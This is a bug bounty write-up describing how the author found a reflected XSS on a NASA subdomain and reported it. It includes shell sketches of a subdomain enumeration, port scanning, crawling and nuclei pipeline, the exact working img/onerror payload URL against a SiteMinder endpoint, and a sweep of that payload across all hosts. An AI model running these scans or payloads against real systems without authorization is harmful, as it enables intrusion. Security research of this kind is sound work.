How I Found a Reflected XSS at NASA

Jh0n_0x
4 min read · Feb 12, 2024

Hello friends, this is my first article in the security space. I will share some of my bug bounty experiences here, showing how I found certain security flaws in web applications, and I will also be posting research, tips, and suggestions. I hope you like it. Forgive me for any spelling errors :).

In this first article I will explain how I found a reflected XSS on a NASA subdomain. I received messages from several people asking how I did it, what my process was, and so on, and since I was already thinking about starting to write articles, I decided to combine the useful with the pleasant.

Finding the flaw was a relatively simple process. I honestly don't like saying that, because it can send the wrong message to readers: for those just starting out, the idea that other professional hackers find flaws easily while they cannot can be distressing, even disappointing. That is why I like to say that the important thing is to know your process, understand the application, and think differently. It may sound cliché, but believe me, it is the most effective approach.

I generally prefer to look for flaws manually, but I also use some tools to automate repetitive processes that don't need my full attention and that free up time for me to test other parameters.

So I created a basic script to collect NASA subdomains. It basically uses subfinder, amass, findomain, and crt.sh. After collecting the subdomains, the script removes duplicates and runs a new enumeration pass over the subdomains it found, that is, it collects subdomains on top of subdomains. If you are a beginner this may seem strange, so let me explain: tools like subfinder and findomain query data sources tied to a specific domain or subdomain. For example, for google.com they would return test.google.com, test1.google.com, test2.google.com, and so on. But when we feed a discovered subdomain back into these tools, they can find, for example, helloworld.test.google.com, a deeper subdomain hidden from the simple, conventional checks other researchers might think of.
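The script itself isn't published, but a minimal sketch of that collection step could look something like this (the tool names come from the text above; the exact flags, the crt.sh query, and the file names are my assumptions):

```bash
#!/usr/bin/env bash
# Minimal sketch of recursive subdomain collection (illustrative, not the exact script).
domain="nasa.gov"

# First pass: collect subdomains from several sources.
subfinder -d "$domain" -silent -o subfinder.txt
amass enum -passive -d "$domain" -o amass.txt
findomain -t "$domain" -q > findomain.txt
curl -s "https://crt.sh/?q=%25.${domain}&output=json" \
  | jq -r '.[].name_value' | sed 's/^\*\.//' > crtsh.txt

# Deduplicate everything found so far.
sort -u subfinder.txt amass.txt findomain.txt crtsh.txt > round1.txt

# Second pass: enumerate again on top of each discovered subdomain,
# which can surface deeper hosts such as helloworld.test.example.com.
subfinder -dL round1.txt -silent -o round2.txt
sort -u round1.txt round2.txt > subdomains.txt
```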

So, after this complete collection of subdomains, the script checks which of these hosts are active using httpx. I particularly like httpx because it lets me do some additional checks, such as returning the page title, the status code, the technologies in use, whether the request is redirected and where to, and even probing web services on other ports. This kind of information is very useful to me: it gives me a general picture of my target and a guide on where to start attacking. I recommend reading the documentation and choosing whatever parameters you prefer: https://docs.projectdiscovery.io/tools/httpx/overview.
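As a rough idea, the probing step can be a single httpx call; the flag selection here is illustrative, and the documentation linked above lists everything it can report:

```bash
# Probe the collected subdomains and keep useful context for each live host:
# page title, status code, detected technologies, redirect target, and a few
# common alternative web ports.
httpx -l subdomains.txt \
      -title -status-code -tech-detect \
      -follow-redirects -location \
      -ports 80,443,8080,8443 \
      -silent -o live-hosts.txt
```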

Now that we have the active hosts, I check the open ports on each of them. I like to use naabu for this, with the -nmap-cli parameter so that nmap can gather more detailed information about the services that are running, such as versions, basic Lua scripts, and so on.
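Roughly, that port-scanning step looks like the sketch below. The -nmap-cli flag is the one mentioned above; the nmap options shown (-sV for versioning, -sC for the default Lua/NSE scripts) are the usual ones I mean by "more detailed information", and the file names are assumptions:

```bash
# naabu expects bare hostnames/IPs, so strip the scheme from the httpx output first.
sed -E 's~https?://~~' live-hosts.txt | sort -u > live-hostnames.txt

# Scan the live hosts for open ports, then hand the results to nmap for
# service/version detection (-sV) and the default Lua/NSE scripts (-sC).
naabu -list live-hostnames.txt -top-ports 1000 \
      -nmap-cli 'nmap -sV -sC -oA nmap-results'
```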

With this information gathered, my script writes the active hosts that are running web services, on whatever port, to a separate file. Then I crawl them using both passive and active sources, with gauplus or gau, waybackurls, katana, ParamSpider, and linkfinder, and I sort everything with tomnomnom's excellent tool, GF: https://github.com/tomnomnom/gf. With it I can group the endpoints by potential vulnerability class for later testing.
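A sketch of the crawling and sorting step; I'm only showing a few of the tools listed above, the web-hosts.txt name stands in for the file of web hosts just described, and the gf patterns assume a community pattern set (such as Gf-Patterns) is installed:

```bash
# Gather URLs for each web host, passively (gau, waybackurls) and
# actively (katana), then deduplicate.
cat web-hosts.txt | gau --subs       >  urls.txt
cat web-hosts.txt | waybackurls      >> urls.txt
katana -list web-hosts.txt -silent   >> urls.txt
sort -u urls.txt -o urls.txt

# Bucket the endpoints by likely vulnerability class for later testing.
for pattern in xss sqli ssrf lfi redirect; do
    gf "$pattern" < urls.txt > "endpoints-${pattern}.txt"
done
```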

And finally, my script runs nuclei, using the updated templates plus some additional ones, to check whether the web application has any known vulnerability for which a CVE has already been registered.
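Conceptually the nuclei step is just the following; the template paths are illustrative, and the second -t directory stands in for the "additional templates":

```bash
# Refresh the official templates, then run them plus a custom set against
# the live web hosts, saving anything that matches a known issue/CVE.
nuclei -update-templates
nuclei -l live-hosts.txt \
       -t ~/nuclei-templates/ -t ~/custom-templates/ \
       -o nuclei-results.txt
```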

And so, using nuclei, we found an XSS on a NASA subdomain:

sub.sub.nasa.gov/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=7&USERNAME=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e
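If the escape sequences look odd: the USERNAME value is simply a Unicode-escaped image tag with an onerror handler. A quick way to see the decoded payload (bash 4.2+ understands \u escapes in printf):

```bash
# Decode the \uXXXX escapes from the USERNAME parameter (bash >= 4.2).
printf '\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e\n'
# Output: <img src=x onerror="confirm(document.domain)">
```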

And of course, like a good scout, just to be thorough, I took this endpoint and, using the meg tool, ran it against all NASA subdomains and IPs, hoping to find another web application with the same vulnerability, but without success.
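For reference, meg takes a paths file, a hosts file, and an output directory, and requests every path on every host; the sweep was roughly the following (file names, the payload placeholder, and the grep are mine):

```bash
# Request the vulnerable endpoint (payload from above, abbreviated here as <payload>)
# on every collected host and save the responses.
echo '/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=7&USERNAME=<payload>' > paths.txt
meg paths.txt live-hosts.txt meg-out/

# Look for hosts that reflect the injected attribute back.
grep -ril 'onerror' meg-out/
```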

So I reported the vulnerability, which was properly handled by the NASA security team.

I hope you liked it. I'm open to suggestions and questions: message me on Twitter at https://twitter.com/Jh0n_0x and I'll respond to everyone. Leave your claps to help with more content like this, and better content to come.

Thanks, until next time.

